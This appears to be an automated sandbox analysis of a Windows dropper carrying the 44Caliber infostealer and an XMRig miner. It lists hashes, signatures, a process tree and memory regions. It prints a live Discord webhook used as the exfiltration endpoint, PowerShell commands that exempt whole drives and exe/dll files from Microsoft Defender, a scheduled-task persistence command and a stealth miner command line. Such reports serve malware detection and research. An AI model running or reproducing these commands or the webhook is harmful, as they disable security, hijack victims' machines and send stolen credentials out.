Analysis

  • max time kernel
    167s
  • max time network
    184s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220310-en
  • submitted
    20-03-2022 05:19

General

  • Target

    86523374.exe

  • Size

    5.2MB

  • MD5

    23c2521d2d7f41cdc515db9c7a7d6dcb

  • SHA1

    ba422cc6f49b1639d35d61ea9ddec24149649929

  • SHA256

    e2d81a70b783df979b49f9caf84b20076533e37068b2db60e6d589eec5bacee4

  • SHA512

    486ce40687b16f67d8f1473ecc31aadd979fff43bc836b48d502efcf5eb91e1de60f3e47c0e1df0592b17bf7992016c13534fdd2c5afb2b3f1f4482262340bfa

Malware Config

Extracted

Family

44caliber

C2

https://discordapp.com/api/webhooks/934716186313240606/NIuB64dK4IPafrX9FRy2wNNRrBnOxvdLjio6Ou2fEKxC9HrdYgZQcnvkOx-a4O9pNzdW

Signatures

  • 44Caliber

    An open source infostealer written in C#.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 3 IoCs
  • Executes dropped EXE 5 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 58 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\86523374.exe
    "C:\Users\Admin\AppData\Local\Temp\86523374.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:5036
    • C:\Users\Admin\AppData\Local\Temp\KLNR.exe
      "C:\Users\Admin\AppData\Local\Temp\KLNR.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4788
      • C:\Windows\SysWOW64\fondue.exe
        "C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1572
        • C:\Windows\system32\FonDUE.EXE
          "C:\Windows\sysnative\FonDUE.EXE" /enable-feature:NetFx3 /caller-name:mscoreei.dll
          4⤵
            PID:1112
      • C:\Users\Admin\AppData\Local\Temp\Insidious2.exe
        "C:\Users\Admin\AppData\Local\Temp\Insidious2.exe"
        2⤵
        • Executes dropped EXE
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4496
      • C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe
        "C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4468
        • C:\Windows\System32\conhost.exe
          "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe"
          3⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2136
          • C:\Windows\System32\cmd.exe
            "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1120
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1844
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1652
          • C:\Windows\System32\cmd.exe
            "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2804
            • C:\Windows\system32\schtasks.exe
              schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
              5⤵
              • Creates scheduled task(s)
              PID:844
          • C:\Windows\System32\cmd.exe
            "cmd" cmd /c "C:\Windows\system32\services64.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4900
            • C:\Windows\system32\services64.exe
              C:\Windows\system32\services64.exe
              5⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:1100
              • C:\Windows\System32\conhost.exe
                "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
                6⤵
                • Drops file in System32 directory
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4624
                • C:\Windows\System32\cmd.exe
                  "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1736
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                    8⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1904
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                    8⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4156
                • C:\Windows\system32\Microsoft\Libs\sihost64.exe
                  "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:2620
                  • C:\Windows\System32\conhost.exe
                    "C:\Windows\System32\conhost.exe" "/sihost64"
                    8⤵
                      PID:4468
                  • C:\Windows\explorer.exe
                    C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6238470 --pass=GAMENAME --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
                    7⤵
                      PID:2432
                      • C:\Windows\system32\WerFault.exe
                        C:\Windows\system32\WerFault.exe -u -p 2432 -s 288
                        8⤵
                        • Program crash
                        PID:2020
                      • C:\Windows\system32\WerFault.exe
                        C:\Windows\system32\WerFault.exe -u -p 2432 -s 332
                        8⤵
                        • Program crash
                        PID:1144
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -pss -s 452 -p 2432 -ip 2432
          1⤵
            PID:2988
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -pss -s 184 -p 2432 -ip 2432
            1⤵
              PID:4940

            Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

              MD5

              b245679121623b152bea5562c173ba11

              SHA1

              47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d

              SHA256

              73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f

              SHA512

              75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

              MD5

              d85ba6ff808d9e5444a4b369f5bc2730

              SHA1

              31aa9d96590fff6981b315e0b391b575e4c0804a

              SHA256

              84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

              SHA512

              8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              MD5

              cadef9abd087803c630df65264a6c81c

              SHA1

              babbf3636c347c8727c35f3eef2ee643dbcc4bd2

              SHA256

              cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

              SHA512

              7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              MD5

              e69c5554cfe965e000e33ee9f1cd88d5

              SHA1

              ef74e8e9a0113870c87ece51d4e86040b1eeecdc

              SHA256

              712c2be9f3cff2c74ba7c7cd92208f724c8862277dd8b4f6f2605cc50fb4fdd0

              SHA512

              6a8e64e11df3fa1aa32f95387f3b43d2ed6f4c996db8cee9110586e4bb9eba604550235b6fa6a41beb6fcc31339cb969a6e79d3fcf1f7d42dcd4655cfee38a16

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              MD5

              9a2c763c5ff40e18e49ad63c7c3b0088

              SHA1

              4b289ea34755323fa869da6ad6480d8d12385a36

              SHA256

              517807921c55bd16cd8a8bfae3d5dc19444c66f836b66acd5593e3080acbaf8e

              SHA512

              3af01926bc7de92076067d158d7250b206d396b3282ee0db43639d04d91bd9ff763acbce12c7822914824984a3c5fdd1b8dbf1ad2ee88233d47f0f808b746bc8

            • C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe

              MD5

              692461c05ba5cfb84d5fcb2bc56adafd

              SHA1

              c9df2056da3af20175f9ab1942058ef778c438b2

              SHA256

              1bd4f98c3c59ba62e79448064f48661c2acbc87d85ecd1556f68a3e23a3c2e2c

              SHA512

              68cef4b8123f1b0c24adbe6f71817b5fa2df3100d112813cfa73b6c0a148717b9f354409cccb941a42ae9e60493bb4dafc2c99318088be8b9416e8a30776bf46

            • C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe

              MD5

              692461c05ba5cfb84d5fcb2bc56adafd

              SHA1

              c9df2056da3af20175f9ab1942058ef778c438b2

              SHA256

              1bd4f98c3c59ba62e79448064f48661c2acbc87d85ecd1556f68a3e23a3c2e2c

              SHA512

              68cef4b8123f1b0c24adbe6f71817b5fa2df3100d112813cfa73b6c0a148717b9f354409cccb941a42ae9e60493bb4dafc2c99318088be8b9416e8a30776bf46

            • C:\Users\Admin\AppData\Local\Temp\Insidious2.exe

              MD5

              198458bfe3e5de2eb6737beb2d54c292

              SHA1

              59785684874f6b45205db1f96268593c97485dfe

              SHA256

              d8657c28223f4e125ba12b4cc56dac08f48e5ef24c7e295f640f281ae456bfca

              SHA512

              7b10151a06424279cd676f78a61fb0245241fe795b2adb6a930bd331686d4a7843f0abd101c339a3f2c2ec341182b19f47f8e8ab1aaa41338a30d03ecbea5842

            • C:\Users\Admin\AppData\Local\Temp\Insidious2.exe

              MD5

              198458bfe3e5de2eb6737beb2d54c292

              SHA1

              59785684874f6b45205db1f96268593c97485dfe

              SHA256

              d8657c28223f4e125ba12b4cc56dac08f48e5ef24c7e295f640f281ae456bfca

              SHA512

              7b10151a06424279cd676f78a61fb0245241fe795b2adb6a930bd331686d4a7843f0abd101c339a3f2c2ec341182b19f47f8e8ab1aaa41338a30d03ecbea5842

            • C:\Users\Admin\AppData\Local\Temp\KLNR.exe

              MD5

              8563f76405eb62c0e2a62f57992cb413

              SHA1

              5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918

              SHA256

              a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838

              SHA512

              e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

            • C:\Users\Admin\AppData\Local\Temp\KLNR.exe

              MD5

              8563f76405eb62c0e2a62f57992cb413

              SHA1

              5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918

              SHA256

              a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838

              SHA512

              e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

            • C:\Windows\System32\Microsoft\Libs\sihost64.exe

              MD5

              943c340e0da33f95572f0beb0fdf875b

              SHA1

              d1081ddc04e6d52a737386d85a9193b2326ccf7c

              SHA256

              118a4f9a80ceef768290e81f123246d4adb50785591ff2de9f7cfecd459b5dc9

              SHA512

              51b8a3c5aaa54d0b4d0f544be2b2b05b1fef82427db0c614df35de8b654331c0150d72ab146f0b6d2e51356620df4ad70afad616fc1edd5d13c5410e25a06cd5

            • C:\Windows\System32\services64.exe

              MD5

              692461c05ba5cfb84d5fcb2bc56adafd

              SHA1

              c9df2056da3af20175f9ab1942058ef778c438b2

              SHA256

              1bd4f98c3c59ba62e79448064f48661c2acbc87d85ecd1556f68a3e23a3c2e2c

              SHA512

              68cef4b8123f1b0c24adbe6f71817b5fa2df3100d112813cfa73b6c0a148717b9f354409cccb941a42ae9e60493bb4dafc2c99318088be8b9416e8a30776bf46

            • C:\Windows\system32\Microsoft\Libs\sihost64.exe

              MD5

              943c340e0da33f95572f0beb0fdf875b

              SHA1

              d1081ddc04e6d52a737386d85a9193b2326ccf7c

              SHA256

              118a4f9a80ceef768290e81f123246d4adb50785591ff2de9f7cfecd459b5dc9

              SHA512

              51b8a3c5aaa54d0b4d0f544be2b2b05b1fef82427db0c614df35de8b654331c0150d72ab146f0b6d2e51356620df4ad70afad616fc1edd5d13c5410e25a06cd5

            • C:\Windows\system32\services64.exe

              MD5

              692461c05ba5cfb84d5fcb2bc56adafd

              SHA1

              c9df2056da3af20175f9ab1942058ef778c438b2

              SHA256

              1bd4f98c3c59ba62e79448064f48661c2acbc87d85ecd1556f68a3e23a3c2e2c

              SHA512

              68cef4b8123f1b0c24adbe6f71817b5fa2df3100d112813cfa73b6c0a148717b9f354409cccb941a42ae9e60493bb4dafc2c99318088be8b9416e8a30776bf46

            • memory/1652-158-0x000002DE90F30000-0x000002DE919F1000-memory.dmp

              Filesize

              10.8MB

            • memory/1844-153-0x0000023818BC0000-0x0000023818BE2000-memory.dmp

              Filesize

              136KB

            • memory/1844-151-0x0000023817A20000-0x0000023817A22000-memory.dmp

              Filesize

              8KB

            • memory/1844-152-0x0000023817A23000-0x0000023817A25000-memory.dmp

              Filesize

              8KB

            • memory/1844-154-0x0000023817A26000-0x0000023817A28000-memory.dmp

              Filesize

              8KB

            • memory/1844-155-0x0000023817A28000-0x0000023817A29000-memory.dmp

              Filesize

              4KB

            • memory/1844-150-0x0000023817D90000-0x0000023818851000-memory.dmp

              Filesize

              10.8MB

            • memory/1904-167-0x0000028B2DD40000-0x0000028B2E801000-memory.dmp

              Filesize

              10.8MB

            • memory/1904-170-0x0000028B2D9A8000-0x0000028B2D9A9000-memory.dmp

              Filesize

              4KB

            • memory/1904-169-0x0000028B2D9A3000-0x0000028B2D9A5000-memory.dmp

              Filesize

              8KB

            • memory/1904-168-0x0000028B2D9A0000-0x0000028B2D9A2000-memory.dmp

              Filesize

              8KB

            • memory/1904-171-0x0000028B2D9A6000-0x0000028B2D9A8000-memory.dmp

              Filesize

              8KB

            • memory/2136-145-0x000002594E250000-0x000002594E252000-memory.dmp

              Filesize

              8KB

            • memory/2136-144-0x0000025932E40000-0x0000025933061000-memory.dmp

              Filesize

              2.1MB

            • memory/2136-148-0x000002594E256000-0x000002594E257000-memory.dmp

              Filesize

              4KB

            • memory/2136-149-0x0000025934D20000-0x0000025934D32000-memory.dmp

              Filesize

              72KB

            • memory/2136-146-0x0000025934DA0000-0x0000025935861000-memory.dmp

              Filesize

              10.8MB

            • memory/2136-147-0x000002594E253000-0x000002594E255000-memory.dmp

              Filesize

              8KB

            • memory/2432-181-0x0000000140000000-0x0000000140786000-memory.dmp

              Filesize

              7.5MB

            • memory/2432-180-0x0000000140000000-0x0000000140786000-memory.dmp

              Filesize

              7.5MB

            • memory/2432-179-0x0000000140000000-0x0000000140786000-memory.dmp

              Filesize

              7.5MB

            • memory/4156-182-0x0000025C1E018000-0x0000025C1E019000-memory.dmp

              Filesize

              4KB

            • memory/4156-175-0x0000025C1D4A0000-0x0000025C1DF61000-memory.dmp

              Filesize

              10.8MB

            • memory/4156-176-0x0000025C1E016000-0x0000025C1E018000-memory.dmp

              Filesize

              8KB

            • memory/4156-177-0x0000025C1E010000-0x0000025C1E012000-memory.dmp

              Filesize

              8KB

            • memory/4156-178-0x0000025C1E013000-0x0000025C1E015000-memory.dmp

              Filesize

              8KB

            • memory/4468-183-0x0000023B374F0000-0x0000023B374F6000-memory.dmp

              Filesize

              24KB

            • memory/4468-185-0x0000023B377C0000-0x0000023B377C2000-memory.dmp

              Filesize

              8KB

            • memory/4468-184-0x0000023B391E0000-0x0000023B39CA1000-memory.dmp

              Filesize

              10.8MB

            • memory/4468-186-0x0000023B377C3000-0x0000023B377C5000-memory.dmp

              Filesize

              8KB

            • memory/4468-187-0x0000023B377C6000-0x0000023B377C7000-memory.dmp

              Filesize

              4KB

            • memory/4496-139-0x00000000007A0000-0x00000000007EA000-memory.dmp

              Filesize

              296KB

            • memory/4496-143-0x0000000002870000-0x0000000002872000-memory.dmp

              Filesize

              8KB

            • memory/4496-142-0x00007FFDDE050000-0x00007FFDDEB11000-memory.dmp

              Filesize

              10.8MB

            • memory/4624-166-0x000001BFBD506000-0x000001BFBD507000-memory.dmp

              Filesize

              4KB

            • memory/4624-165-0x000001BFBD503000-0x000001BFBD505000-memory.dmp

              Filesize

              8KB

            • memory/4624-163-0x000001BFA4250000-0x000001BFA4D11000-memory.dmp

              Filesize

              10.8MB

            • memory/4624-164-0x000001BFBD500000-0x000001BFBD502000-memory.dmp

              Filesize

              8KB

            • memory/5036-134-0x0000000000400000-0x000000000093B000-memory.dmp

              Filesize

              5.2MB